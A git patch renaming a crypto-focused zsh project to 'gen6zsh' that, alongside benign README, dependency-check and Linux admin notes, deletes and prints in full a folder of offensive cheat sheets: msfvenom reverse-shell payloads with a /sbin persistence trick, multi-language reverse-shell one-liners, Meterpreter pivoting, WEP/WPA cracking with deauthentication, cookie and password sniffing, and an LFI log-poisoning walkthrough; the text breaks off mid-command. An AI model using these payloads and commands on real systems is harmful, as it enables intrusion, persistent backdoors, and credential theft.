From f285d6831f8ae169b43bcc7d9f6f839b28e78eb6 Mon Sep 17 00:00:00 2001 From: six Date: Mon, 14 Apr 2025 11:59:54 +0700 Subject: [PATCH] Gen6 tools --- README.md | 17 ++- dependency_check.zsh | 28 +++- tools/bcp.py | 102 -------------- tools/v3das/_n | 3 - tools/v3das/coding_python_venv.txt | 6 - tools/v3das/communication_xmpp_mcabber.txt | 42 ------ tools/v3das/linux_chroot_grub_install.txt | 12 -- .../linux_iptables_workstation_example.txt | 21 --- tools/v3das/linux_luks_pendrive.txt | 23 ---- tools/v3das/linux_zfs_debian7.txt | 64 --------- .../v3das/metasploit_meterpreter_pivoting.txt | 17 --- .../v3das/metasploit_msfvenom_cheatsheet.txt | 126 ------------------ tools/v3das/network_iptables.txt | 16 --- .../network_sniffing_tcpdump_examples.txt | 7 - .../network_sniffing_tshark_examples.txt | 11 -- tools/v3das/network_sniffing_wireshark.txt | 37 ----- tools/v3das/network_switch_cisco_reset.txt | 7 - .../network_wireless_cracking_aircrack.txt | 75 ----------- tools/v3das/shell_cheatsheet.txt | 32 ----- tools/v3das/web_file_inclusion.txt | 41 ------ tools/v3das/web_fuzz_strings.txt | 14 -- tools/v3das/web_injection_php.txt | 11 -- tools/v3das/web_injection_sqli.txt | 43 ------ tools/v3das/web_xss_cookie_stealing.txt | 3 - zsh_files/.zsh | 0 zsh_files/.zshrc | 3 - zsh_files/crypto.zsh | 15 +-- zsh_files/gen6.zsh | 47 +++++++ zsh_files/general.zsh | 16 ++- zsh_files/hacking.zsh | 1 - zsh_files/vedas.zsh | 25 ---- zsh_files/zshrc | 3 + 32 files changed, 95 insertions(+), 773 deletions(-) delete mode 100755 tools/bcp.py delete mode 100755 tools/v3das/_n delete mode 100755 tools/v3das/coding_python_venv.txt delete mode 100755 tools/v3das/communication_xmpp_mcabber.txt delete mode 100755 tools/v3das/linux_chroot_grub_install.txt delete mode 100755 tools/v3das/linux_iptables_workstation_example.txt delete mode 100755 tools/v3das/linux_luks_pendrive.txt delete mode 100755 tools/v3das/linux_zfs_debian7.txt delete mode 100755 tools/v3das/metasploit_meterpreter_pivoting.txt delete mode 100755 tools/v3das/metasploit_msfvenom_cheatsheet.txt delete mode 100755 tools/v3das/network_iptables.txt delete mode 100755 tools/v3das/network_sniffing_tcpdump_examples.txt delete mode 100755 tools/v3das/network_sniffing_tshark_examples.txt delete mode 100755 tools/v3das/network_sniffing_wireshark.txt delete mode 100755 tools/v3das/network_switch_cisco_reset.txt delete mode 100755 tools/v3das/network_wireless_cracking_aircrack.txt delete mode 100755 tools/v3das/shell_cheatsheet.txt delete mode 100755 tools/v3das/web_file_inclusion.txt delete mode 100755 tools/v3das/web_fuzz_strings.txt delete mode 100755 tools/v3das/web_injection_php.txt delete mode 100755 tools/v3das/web_injection_sqli.txt delete mode 100755 tools/v3das/web_xss_cookie_stealing.txt delete mode 100755 zsh_files/.zsh delete mode 100755 zsh_files/.zshrc create mode 100755 zsh_files/gen6.zsh delete mode 100755 zsh_files/hacking.zsh delete mode 100755 zsh_files/vedas.zsh create mode 100755 zsh_files/zshrc diff --git a/README.md b/README.md index 9e0c2cd..ac31a31 100755 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -CryptoZsh +gen6zsh ==== The aim of this project is to create a zsh environment for users who work with: cryptocurrencies, blockchain projects and crytpography itself. @@ -6,6 +6,7 @@ The aim of this project is to create a zsh environment for users who work with: Tools and Functions inside /draft/ ==== +- Check state of Gen6 services - Random generation rules - Network crypto tools - Logical note taking with linking @@ -21,8 +22,12 @@ Commands calling functions: Installing ==== -cd /tmp/ -git clone https://git.hsbp.org/Awalcon/CryptoZsh -cp CryptoZsh/zsh_files/.zshrc ~/ -cp -R CryptoZsh/zsh_files ~/.cryptozsh -cp -R CryptoZsh/tools ~/.cryptozsh_tools + +``` +cd /tmp/ && git clone https://git.hsbp.org/G6_Networks/gen6zsh && cd gen6zsh && mkdir ~/.gen6zsh && cp zsh_files/* ~/.gen6zsh && mv ~/.gen6zsh/zshrc ~/.zshrc && cp -R tools ~/.gen6zsh_tools +``` + +Check dependencies: +``` +zsh /tmp/gen6zsh/dependency_check.zsh +``` diff --git a/dependency_check.zsh b/dependency_check.zsh index 37ae91b..d9f0901 100755 --- a/dependency_check.zsh +++ b/dependency_check.zsh @@ -1,16 +1,32 @@ #!/bin/zsh -function chkdep { +# Dependency check for gen6zsh + +echo "Checking dependencies..." + +chkdep() { + # Web n code type python3 >/dev/null 2>&1 || { echo >&2 "python is missing."; } type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; } + type websocat >/dev/null 2>&1 || { echo >&2 "wget is missing."; } + + # G6 Substrate + # SS58 Converter: http://github.com/shamilsan/ss58.org + type subkey >/dev/null 2>&1 || { echo >&2 "wget is missing."; } type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; } - type john >/dev/null 2>&1 || { echo >&2 "john is missing."; } + type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } + + # General tools type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; } type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; } type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; } - type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; } - type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; } type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; } - type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } + + #secu + #type john >/dev/null 2>&1 || { echo >&2 "john is missing."; } + #type aircrack-ng >/dev/null 2>&1 || { echo >&2 "aircrack is missing."; } + #type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; } + #type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; } + } -chkdep() +chkdep diff --git a/tools/bcp.py b/tools/bcp.py deleted file mode 100755 index 8bf66fd..0000000 --- a/tools/bcp.py +++ /dev/null @@ -1,102 +0,0 @@ -#!/usr/bin/python3 -import hashlib -import random -import sys - -## That part was originally secrets.py --> now bcp is integrated into a single file program -"""Generate cryptographically strong pseudo-random numbers suitable for -managing secrets such as account authentication, tokens, and similar. - -See PEP 506 for more information. -https://www.python.org/dev/peps/pep-0506/ - -Amit nem hasznalok belole azt kivettem! -Eredeti forras: https://raw.githubusercontent.com/python/cpython/3.7/Lib/secrets.py - -""" - -__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom', - 'token_bytes', 'token_hex', 'token_urlsafe', - 'compare_digest', - ] - -import base64 -import binascii -import os - -from hmac import compare_digest -from random import SystemRandom - -_sysrand = SystemRandom() - -randbits = _sysrand.getrandbits -choice = _sysrand.choice - -DEFAULT_ENTROPY = 64 # number of bytes to return by default - -def token_bytes(nbytes=None): - """Return a random byte string containing *nbytes* bytes. - >>> token_bytes(16) #doctest:+SKIP - b'\\xebr\\x17D*t\\xae\\xd4\\xe3S\\xb6\\xe2\\xebP1\\x8b'""" - if nbytes is None: - nbytes = DEFAULT_ENTROPY - return os.urandom(nbytes) - - -def token_hex(nbytes=None): - """Return a random text string, in hexadecimal. - >>> token_hex(16) #doctest:+SKIP - 'f9bf78b9a18ce6d46a0cd2b0b86df9da'""" - return binascii.hexlify(token_bytes(nbytes)).decode('ascii') -## End of integrated secrets.py - -# Az egyszeruseg kedveert, 1 tomb = 1 sor - -blokklanc_file = os.getenv("HOME") + "/.blokklanc.pp" - -# Eredet tomb letrehozasa ha nem letezik -if not os.path.exists(blokklanc_file): - # Genezis/eredet tomb letrehozasa randommal, hogy ha ugyan az is ket szoveg, soha ne ugyan az legyen a kimenetel - eredet = "Eredet." - erand = token_hex(64) - etomb_adat = eredet + erand - etomb_hash = hashlib.sha512(etomb_adat.encode('utf-8')).hexdigest() - print("Initializing...") - print("Origin block: " + str(etomb_adat) + '||' + etomb_hash) - # beirni eredetet - ask_for_write = input("Save the first block into " + blokklanc_file + "? [y/n] ") - if ask_for_write != "y": - sys.exit() - f = open(blokklanc_file,'w') - f.write(str(etomb_adat) + etomb_hash) - f.close() - - -# kiolvassa az utolso sort -def utolso_sor(): - blokk_file = open(blokklanc_file,'r') - for sor in blokk_file: - fb_sor = sor - print("Utolsó tömb: " + fb_sor) - return fb_sor - -# hozzaad egy uj tombot -def uj_tomb(tomb_adat): - utolso_tomb_hash = utolso_sor() - uj_tomb = hashlib.sha512(utolso_tomb_hash.encode('utf-8')).hexdigest() + '||' + tomb_adat + '||' - uj_tomb_hash = hashlib.sha512(uj_tomb.encode('utf-8')).hexdigest() - fu = open(blokklanc_file,'a') - fu.write('\n' + uj_tomb + uj_tomb_hash) - -# ujraszamolja a blokklanc helyesseget -def teljes_lanc_ellenorzes(): - pass -teljes_lanc_ellenorzes() - - -# Kovetkezo letrehozasa -jegyzet = input("What do you want to add to the blockchain? ") -uj_tomb(jegyzet) -#print("Teszt: " + hashlib.sha512("teszt".encode('utf-8')).hexdigest()) - -# cut -d '|' -f 3 blokklanc.pp | egrep -v "^Eredet." diff --git a/tools/v3das/_n b/tools/v3das/_n deleted file mode 100755 index 0b1b695..0000000 --- a/tools/v3das/_n +++ /dev/null @@ -1,3 +0,0 @@ -#compdef n - -_arguments "1: :( $(ls ~/.cryptozsh_tools/v3das/ ) )" diff --git a/tools/v3das/coding_python_venv.txt b/tools/v3das/coding_python_venv.txt deleted file mode 100755 index 4bee2e6..0000000 --- a/tools/v3das/coding_python_venv.txt +++ /dev/null @@ -1,6 +0,0 @@ -tl;dr the use of virtual env: - -# #! /usr/bin/env python -# . venv/bin/activate - - diff --git a/tools/v3das/communication_xmpp_mcabber.txt b/tools/v3das/communication_xmpp_mcabber.txt deleted file mode 100755 index 8bb9aa9..0000000 --- a/tools/v3das/communication_xmpp_mcabber.txt +++ /dev/null @@ -1,42 +0,0 @@ -# mcabber is a great command line client to use for chat (XMPP) with authentication and encrytpion (OTR). - -# The following comments and commands will help you to install and use it. - -# Register your account -# Go to jit.si for example - -# Create directory for mcabber config and OTR -mkdir -p .mcabber/otr - -# Copy the sample configuration files -cp /usr/share/doc/mcabber/examples/mcabberrc.example.gz ~/. - -# If the files does not exist, the path may be different. -# Like "/usr/share/doc/mcabber/mcabberrc.example" - -# Unzip the configuration file and rename it -gunzip mcabberrc.example.gz -mv mcabberrc.example.gz .mcabberrc - -# Correct the priviliges if needed -chmod 700 .mcabber/ -R -chmod 700 .mcabberrc - -# Edit your configuration with the following settings: -vim .mcabberrc - set jid = testuser@jit.si - set otr = 1 - -# Start mcabber and login with the account you have registered -mcabber - -# Basic commands -/add user@jit.si # Request someone for chat -/event 1 accept # To accept a request - -# Using OTR -# It's recommended to add OTR by default policy to your config files -/otr key # Show your fingerprint -/otr fingerprint . "AAAA AAAA AAAA ...." # Trust someon's fingerprint -/otr fingerprint # Show fingerprints you have -/otr start # Start a conversation with OTR diff --git a/tools/v3das/linux_chroot_grub_install.txt b/tools/v3das/linux_chroot_grub_install.txt deleted file mode 100755 index 5763bbf..0000000 --- a/tools/v3das/linux_chroot_grub_install.txt +++ /dev/null @@ -1,12 +0,0 @@ - -# Start a live image, then reinstall grub. - -fdisk -l -mount /dev/sda2 /mnt/ -mount -t proc none /mnt/proc -mount -o bind /dev /mnt/dev -mount -t sysfs sys /mnt/sys -chroot /mnt/ /bin/bash -update-grub -/usr/sbin/grub-install --recheck --no-floppy /dev/sda -sync & reboot diff --git a/tools/v3das/linux_iptables_workstation_example.txt b/tools/v3das/linux_iptables_workstation_example.txt deleted file mode 100755 index 738e9b0..0000000 --- a/tools/v3das/linux_iptables_workstation_example.txt +++ /dev/null @@ -1,21 +0,0 @@ -#!/bin/bash -# Example iptables for workstation - -IPT=/sbin/iptables -$IPT -F - -#Policies -$IPT -P OUTPUT ACCEPT -$IPT -P INPUT DROP -$IPT -P FORWARD DROP - -#Allow IN for services -$IPT -A INPUT --in-interface lo -j ACCEPT - -#Allow response -$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT - -# Block ipv6, sorry lazy to set path, its a note :) -ip6tables -P INPUT DROP 2>/dev/null -ip6tables -P FORWARD DROP 2>/dev/null -ip6tables -P OUTPUT DROP 2>/dev/null diff --git a/tools/v3das/linux_luks_pendrive.txt b/tools/v3das/linux_luks_pendrive.txt deleted file mode 100755 index f610c9e..0000000 --- a/tools/v3das/linux_luks_pendrive.txt +++ /dev/null @@ -1,23 +0,0 @@ -# CryptSetup for pendrive example - -# Creation, make sure no CBC is used anymore! -cryptsetup -c aes -s 256 luksFormat /dev/sdb2 -cryptsetup luksDump /dev/sdb2 # To check it! - -cryptsetup luksOpen /dev/sde usb1 -mkfs.vfat /dev/mapper/usb1 -n "usb1" - -# Troubleshoot if needed -dmsetup ls -dmsetup ls - -# Change Passphrse -cryptsetup -y luksAddKey ENCRYPTED_PARTITION -cryptsetup luksRemoveKey ENCRYPTED_PARTITION - -# Mount and unmount -cryptsetup luksOpen /dev/sdb2 usb1 -mount /dev/mapper/usb1 /mnt -umount /mnt/point - - diff --git a/tools/v3das/linux_zfs_debian7.txt b/tools/v3das/linux_zfs_debian7.txt deleted file mode 100755 index 226dad6..0000000 --- a/tools/v3das/linux_zfs_debian7.txt +++ /dev/null @@ -1,64 +0,0 @@ -# How to create ZFS mirroring on Debian 7 / Old notes! - -# Information were gathered from the following sites: -# http://zfsonlinux.org/debian.html -# http://www.zfsbuild.com/2010/06/03/howto-create-mirrored-vdev-zpool/ -# http://allgood38.io/setting-up-a-basic-linux-zfs-instance.html -# https://help.ubuntu.com/community/encryptedZfs -# http://linux.arantius.com/installing-gentoo-into-a-luks-encrypted-zfs-root -# -# CheatSheet: http://lildude.co.uk/zfs-cheatsheet - -# Get ZFS On Linux debian package, install it and add their GPG key to APT -su -wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_8_all.deb -dpkg -i zfsonlinux_8_all.deb -wget http://zfsonlinux.org/4D5843EA.asc -O - | apt-key add - - -# Install ZFS using APT -apt-get update -apt-get install debian-zfs - -# Create LUKS encrypted volumes -cryptsetup luksFormat /dev/sdc -cryptsetup luksFormat /dev/sdd - -# Open luks encrypted devices - those will be mirrored -cryptsetup luksOpen /dev/sdc luk1 -cryptsetup luksOpen /dev/sdd luk2 - -# Create the mirror pool using the opened luks devices -# WARNING -# THIS DESTROYES YOUR EXISTING POOL IF YOU ALREADY HAVE ONE! -zpool create -m none -O compression=lz4 m_pool mirror luk1 luk2 -# -m mountpoint -O -# END OF CREATION -# Done! - -# The following part is required for mounting/opening our ZFS mirror. - -# Import the pool if it's not already -zpool import m_pool - -# Mount it manually -zfs set mountpoint=/mpool m_pool - -# Checks -zpool list -zpool iostat -zpool status - - --------- - -# Finally change privileges if needed -chown -R storager:storager /mpool - -# Create ZFS filesystem -zfs create tank/testfs - - --------- - -# Destory -zpool destroy m_pool diff --git a/tools/v3das/metasploit_meterpreter_pivoting.txt b/tools/v3das/metasploit_meterpreter_pivoting.txt deleted file mode 100755 index 995512a..0000000 --- a/tools/v3das/metasploit_meterpreter_pivoting.txt +++ /dev/null @@ -1,17 +0,0 @@ -# With "autoroute" it is possible to attack through the remote machine. - -# Start handler -use exploit/multi/handler -set payload windows/meterpreter/reverse_tcp -set lhost 10.1.1.1 - -# Add route to which network you want to look into -run autoroute -s 10.2.2.0/24 -run autoroute -p - -# Scan -use auxiliary/scanner/portscan/tcp -set RHOSTS 10.2.2.0/24 -set THREADS 50 -set ports 20,21,22,25,53,69,80,139,443,445,993,8080 - diff --git a/tools/v3das/metasploit_msfvenom_cheatsheet.txt b/tools/v3das/metasploit_msfvenom_cheatsheet.txt deleted file mode 100755 index 95c6d72..0000000 --- a/tools/v3das/metasploit_msfvenom_cheatsheet.txt +++ /dev/null @@ -1,126 +0,0 @@ -C0nn3ctz msfvenom payload backdoor veil - -List payloads -msfvenom -l - -# The script way to make life more simple -theip=0.0.0.0 -theport=443 - - -Binaries and libs -================= - -Linux -msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf -msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf - -Windows -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe -msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf -msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED -msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport - -Mac -msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho - - - -Web Payloads -============ - -PHP -msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php -cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php - -ASP -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp - -JSP -msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp - -WAR -msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war - -JavaScript -msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le - - - -Scripting Payloads -================== - -Python -msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py - -Bash -msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh - -Perl -msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux -msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows - - - -Shellcode -========= - -For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. - -Linux Based Shellcode -msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f - -Windows Based Shellcode -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f -msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c -msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small - -Mac Based Shellcode -msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f - - - -Handler -======= - -Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. - -use exploit/multi/handler -set PAYLOAD cmd/windows/powershell_reverse_tcp -set LHOST 0.0.0.0 -set LPORT 443 -set ExitOnSession false -exploit -j -z - -Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ - - - -Persistence -=========== -meterpreter > run persistence - - - -UUID Payload -============ - -# Create payload -msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat - -# Setup msf listener -set payload linux/x86/meterpreter/reverse_tcp_uuid -set payloadUUIDName HAXHAXHAXHAX -set PayloadUUIDTracking true -run -j  - -# Move to vict -cat hipchat.elf |ncat --ssl -lvp 53 -nc --ssl domainzz.com 53 > /sbin/lister -chmod +x /sbin/lister - -# crontab alternatively: -if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi - diff --git a/tools/v3das/network_iptables.txt b/tools/v3das/network_iptables.txt deleted file mode 100755 index 71739ac..0000000 --- a/tools/v3das/network_iptables.txt +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash -# Desktop example -> just like in the LWHP repo - -IPT=/sbin/iptables -$IPT -F - -#Policies -$IPT -P OUTPUT ACCEPT -$IPT -P INPUT DROP -$IPT -P FORWARD DROP - -#Allow IN for services -$IPT -A INPUT --in-interface lo -j ACCEPT - -#Allow response -$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT diff --git a/tools/v3das/network_sniffing_tcpdump_examples.txt b/tools/v3das/network_sniffing_tcpdump_examples.txt deleted file mode 100755 index 264636a..0000000 --- a/tools/v3das/network_sniffing_tcpdump_examples.txt +++ /dev/null @@ -1,7 +0,0 @@ - -tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie -tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:" -tcpdump -r file.cap -s 1024 -l -A dst domain.com - -tcpdump -A # show raw data - diff --git a/tools/v3das/network_sniffing_tshark_examples.txt b/tools/v3das/network_sniffing_tshark_examples.txt deleted file mode 100755 index cf685d2..0000000 --- a/tools/v3das/network_sniffing_tshark_examples.txt +++ /dev/null @@ -1,11 +0,0 @@ - -# tshark follow stream -tshark -r -R "" -T fields -e tcp.stream -tshark -q -r http.pcapng -z follow,tcp,ascii,1 - -# etc -tshark grep from http -tshark -r file.cap 'http' | egrep -i "login|pass" -tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"' - diff --git a/tools/v3das/network_sniffing_wireshark.txt b/tools/v3das/network_sniffing_wireshark.txt deleted file mode 100755 index 006832d..0000000 --- a/tools/v3das/network_sniffing_wireshark.txt +++ /dev/null @@ -1,37 +0,0 @@ -C0nn3ctz sniffing wireshark network - -IP address -ip.addr == 192.168.1.1 -ip.src == 192.168.1.1 -ip.dst == 192.168.1.1 - -Show only tcp port 110 -tcp.port eq 110 - -Show only tcp and udp port 110 -tcp.port eq 110 || udp.port eq 110 - -Follow TCP stream -tcp.stream eq 0 - -Show only TCP -tcp - -Show only ARP -arp - -Show only HTTP -http - -Show only HTTP or ARP -http||arp - - -HTTP and ip.src -http&&ip.src==192.168.1.4 - -HTTP POST -http:.request.method == "POST" - -etc -(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4) diff --git a/tools/v3das/network_switch_cisco_reset.txt b/tools/v3das/network_switch_cisco_reset.txt deleted file mode 100755 index a2310d5..0000000 --- a/tools/v3das/network_switch_cisco_reset.txt +++ /dev/null @@ -1,7 +0,0 @@ - -# reset a cisco switch -flash_init -dir flash: -rename flash:config.text flash:config.backup -boot - diff --git a/tools/v3das/network_wireless_cracking_aircrack.txt b/tools/v3das/network_wireless_cracking_aircrack.txt deleted file mode 100755 index d8fca42..0000000 --- a/tools/v3das/network_wireless_cracking_aircrack.txt +++ /dev/null @@ -1,75 +0,0 @@ -# cracking WEP with clients -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth -aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster -aircrack-ng -0 $CAP_FILE - - -# cracking WEP via a client -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth -aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack -aircrack-ng -0 -z -n 64 $CAP_FILE - - -# clientless WEP cracking -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth -aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA -aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA -packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA -aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet -aircrack-ng -0 $CAP_FILE - - -# bypassing WEP SKA -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file -aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack -aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster -aircrack-ng -0 -z -n 64 $CAP_FILE - - -# cracking WPA PSK -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE - - -# cracking WPA with John The Ripper -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -# change to password folder -vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]" -./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE - - -# cracking WPA with coWPAtty -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID -genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack -cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack - - -# cracking WPA with pyrit -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -pyrit list_cores -pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough - -pyrit -i $WORDLIST import_password # Import the wordlist to the database -pyrit -e $AP_ESSID create_essid # Add ESSID to the database -pyrit batch -pyrit -r $CAPTURE_FILE attack_db - diff --git a/tools/v3das/shell_cheatsheet.txt b/tools/v3das/shell_cheatsheet.txt deleted file mode 100755 index c48abdd..0000000 --- a/tools/v3das/shell_cheatsheet.txt +++ /dev/null @@ -1,32 +0,0 @@ - -Shell cheatsheet -================ - -Bash -bash -i >& /dev/tcp/HOST/PORT 0>&1? - -Perl -perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' - -Python -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' - -PHP -php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' - -Ruby -ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' - -nc -nc -e /bin/sh 10.0.0.1 1234 - -Java -r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) -p.waitFor() - -More info and tips -http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387 -http://unix.stackexchange.com/questions/116010/meaning-of-bash-i-dev-tcp-host-port-01 - diff --git a/tools/v3das/web_file_inclusion.txt b/tools/v3das/web_file_inclusion.txt deleted file mode 100755 index c4e4c7e..0000000 --- a/tools/v3das/web_file_inclusion.txt +++ /dev/null @@ -1,41 +0,0 @@ - -Local File Inclusion -==================== - -The %00 make php 5.3 and below ignore everything after that. - -Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00 -...then let's add code to the access log :) -~# nc 192.168.1.1 80 - -...and use it -http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00 -...or php shell on linux:) -&3 2>&3");?> -...finally send the requests to nc and exploit: - -# Windows FTP upload -echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp 